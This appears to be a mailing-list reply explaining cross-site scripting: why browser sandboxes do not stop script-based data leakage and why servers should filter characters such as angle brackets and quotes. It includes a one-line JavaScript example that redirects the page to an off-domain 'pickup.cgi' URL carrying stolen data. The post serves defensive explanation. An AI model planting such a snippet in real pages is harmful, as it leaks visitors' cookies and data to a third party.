Michael Ungar wrote: > Okay, I understand that part. Only piece I do not > fully understand is > > A - Assuming one does not allow Active X to run on > their machine, would not the java sandbox limit > sending cookie or other data to another site ? I > though java sandbox limits what mobile code can do on > the computer while Active X does not have any such > limitation,
If javascript or jscript or vbscript or anything of that nature can be executed... then data can be sent off domain. just a little. var x = data_to_send; document.window.location = "http://www.offdomain.com/pickup.cgi?" + x; and thats it. as a side note.... a site admin should not rely on their users to turn settings off to make sure they are secure when visiting the admins site. > B - I've seen literaure which says servers should > block " < > " ' ; ( ) + - " characters. If one has not > blocked all these types what are the implications > (i.e., if only <> types are blocked) ? while "<" and ">" are the first nessasary step... those other special characters can sometimes used to modify HTML in other instances. All in all they are just a good idea to filter so users arent messed with.